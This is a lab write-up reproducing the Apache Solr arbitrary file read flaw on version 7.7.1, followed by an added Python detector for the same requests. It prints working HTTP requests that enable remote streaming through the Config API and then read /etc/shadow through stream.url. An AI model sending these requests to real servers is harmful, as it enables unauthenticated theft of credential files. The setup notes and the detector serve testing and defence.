Apache Solr is an open-source search server written in Java, built mainly on HTTP and Apache Lucene. The Apache Solr arbitrary file read vulnerability lets an attacker read sensitive files and their contents from the target server without authentication.
Affected: Apache Solr <= 8.8.1 (write-ups for the original version already exist online; this test uses version 7.7.1, pitfalls and all).
1. Download the release: wget https://archive.apache.org/dist/lucene/solr/7.7.1/ into /usr/local
Note: /usr/local and /opt are both user-level program directories.
/usr/local: user-level program directory, think of it as C:/Program Files/
/opt: think of it as D:/Software
2. Extract the archive into /usr/local
tar -zxvf solr-7.7.1.tgz -C /usr/local
cd /usr/local/solr-7.7.1/
Run bin/solr start -force. It may print an error; check the system's entropy pool size, around 3000 is basically fine, and Solr starts normally even with the error.
If the entropy pool is too small, see this link for a fix: https://www.huaweicloud.com/articles/a1a36d35760149c8394c59f04b8893c7.html
Once started, visit http://<ip>:8983; the figure below shows the environment set up successfully.
First use the Config API to turn on the requestDispatcher.requestParsers.enableRemoteStreaming switch, which is off by default, then perform the file read.
Note: by default requestDispatcher.requestParsers.enableRemoteStreaming is disabled, so an attacker cannot read arbitrary files.
Under /usr/local/solr-7.7.1/server/solr/ create a new directory ceshi
mkdir ceshi
Copy all files under /usr/local/solr-7.7.1/server/solr/configsets/_default/conf into the new ceshi directory
cd /usr/local/solr-7.7.1/server/solr/configsets/_default/conf
cp -r * /usr/local/solr-7.7.1/server/solr/ceshi
The directory name is best kept the same as the core you create, ceshi; once built it looks like the figure below.
3. Get the core name: /solr/admin/cores?wt=json
4. Build a request against the Solr Config API to enable RemoteStreaming
POST /solr/ceshi/config HTTP/1.1
Host: 192.168.250.77:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 80
Content-Type: application/json
Connection: close

{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
The following response means RemoteStreaming was enabled successfully
HTTP/1.1 200 OK
Connection: close
Content-Type: text/plain;charset=utf-8
Content-Length: 150

{
"responseHeader":{
"status":0,
"QTime":3008},
"WARNING":"This response format is experimental. It is likely to change in the future."
5. Build a request that uses stream.url to read an arbitrary file
POST /solr/ceshi/debug/dump?param=ContentStreams HTTP/1.1
Host: 192.168.250.77:8983
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Origin: http://192.168.250.77:8983
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.213.128:8983/solr/ceshi/config
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close

stream.url=file:///etc/shadow
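As an added example, not from the original write-up or from the Solr project: a small Python detector that flags, in constructed request records, the two request shapes walked through above (a Config API call that sets enableRemoteStreaming to true, and a stream.url or stream.file parameter pointing at a local file), so a defender can alert on them from access logs or a WAF. The sample records, the function names and the parameter handling are assumptions of this example.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample request records (method, request-target, body). They mirror the
# two request shapes walked through above; none of this is traffic from a real host.
SAMPLE_REQUESTS = [
    ("GET", "/solr/admin/cores?wt=json", ""),
    ("POST", "/solr/ceshi/config",
     '{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'),
    ("POST", "/solr/ceshi/debug/dump?param=ContentStreams", "stream.url=file:///etc/shadow"),
    ("GET", "/solr/ceshi/select?q=*:*", ""),
    ("POST", "/solr/ceshi/config", '{"set-property":{"query.queryResultMaxDocsCached":100}}'),
]

REMOTE_STREAMING_KEY = "requestDispatcher.requestParsers.enableRemoteStreaming"
CONFIG_PATH = re.compile(r"^/solr/[^/]+/config/?$")   # per-core Config API endpoint
STREAM_PARAMS = ("stream.url", "stream.file")          # remote-streaming parameters


def classify(method, target, body):
    """Return the findings for one request; an empty list means nothing suspicious."""
    findings = []
    url = urlsplit(target)
    # Finding 1: a Config API call that flips enableRemoteStreaming on.
    if method == "POST" and CONFIG_PATH.match(url.path):
        try:
            cmd = json.loads(body)
        except ValueError:
            cmd = {}
        props = cmd.get("set-property") if isinstance(cmd, dict) else None
        if isinstance(props, dict) and props.get(REMOTE_STREAMING_KEY) is True:
            findings.append("config API enables enableRemoteStreaming")
    # Finding 2: stream.url/stream.file aimed at the local filesystem; the parameters
    # may sit in the query string or in a form-encoded body, so both are merged.
    params = parse_qs(url.query)
    if body and not body.lstrip().startswith("{"):
        for name, values in parse_qs(body).items():
            params.setdefault(name, []).extend(values)
    for name in STREAM_PARAMS:
        for value in params.get(name, []):
            if name == "stream.file" or value.lower().startswith("file:"):
                findings.append(f"{name} targets a local file: {value}")
    return findings


def scan(requests=SAMPLE_REQUESTS):
    """Run classify over (method, target, body) tuples; return (target, finding) pairs."""
    return [(t, f) for m, t, b in requests for f in classify(m, t, b)]
```

Either finding on its own is worth an alert; the pair in sequence from one client, as in the steps above, is the full pattern.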
Step into more pitfalls, learn more, and build up experience from them.
Reference: https://www.freebuf.com/vuls/266685.html